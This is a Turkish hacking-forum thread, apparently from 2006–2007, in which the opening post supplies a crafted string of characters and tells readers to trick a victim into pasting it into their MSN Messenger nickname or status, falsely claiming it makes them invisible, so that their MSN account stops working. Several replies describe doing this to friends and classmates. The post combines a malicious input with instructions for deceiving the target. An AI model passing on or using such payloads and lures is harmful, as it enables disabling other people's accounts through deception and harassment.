MSN den öyle NİCK YAZDIRIN pc si ÇOKSÜN!!!

bulls

Katılımcı Üye
10 Ara 2006
341
7
aşağıdaki kodu kurbana yutturup nicki yapmasını isteyin:

ñ¯a_Á¯aÿ±m¯aÁÇáç±Çáß±Çá§ÁaÇáDZOÇᯱÇ᧱Çár×ÁÇá+ÑÇ á£áÇá

(örneğin msn de görünmez oluyosun falan deyin.)
en geç 1dk sonra o msn kullanılamaz.
uyduruktan e posta alıp denemesini yapabilirsiniz.
kodu kopyeliyip "kişisel bir ileti yazın"kısmına yapıştırabilirsiniz.
denemesini yapıyorsanız sabırlı olun nick i silmeyin yoksa msn e bişi yapmaz.

önemli not;Denemesini kendi msn inizde yapmayın.

:diablo
 

nato58

Yeni üye
26 Ocak 2007
20
0
birisine yaptığımız zmn o kişi msn sini bidaha hiç kullanamıyo mu yoksa kapatıp açınca düzeliyo mu?
 

nato58

Yeni üye
26 Ocak 2007
20
0
ya biley sölicema bi sen bunu yapmışsın iyi güsel de ben buunu arakdaşa uyguladım ******n msn evet gitti açılmadı ama çocuk bana şifresini verdi bende açıldı sonra çocuk kendi pc sinde tekrar denedi onda yine açılmaıdı nie ******n msn si bende açıldı ama
 

nato58

Yeni üye
26 Ocak 2007
20
0
ya cavp yazarmısn lütefen ya ben bunu arkadaş uyguladım onun pc sinde açılmıyo benim pc de onun msn açılıyo nasıl oluyo?
 

KoBifiVe

Yeni üye
10 Ocak 2007
7
0
baba be bu okuduğum yorumlara göre nick in girildiği bilgisayarda bir ploke olma durumu falan mı oluo ben bunu beklemiodum ama gerçekten deli bi çalışma eline salık bunu bi de şifresini göndereni varmı baba :D
 

bulls

Katılımcı Üye
10 Ara 2006
341
7
kanka ben ne diyorum mesajı iyi okudunmu

kendi MSN adresiniz de DENEMEYİN !!!!!!!!!!
 

anti cimbom

Yeni üye
13 Ocak 2007
32
0
ewt okulda hergün bi kişi gelio msnimi geri wer die bgün bi kiş daha eklendi saol :) işe yarıo msne girip girip çıkıo bunu nasıl düzeltirim onuda sölermsin :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.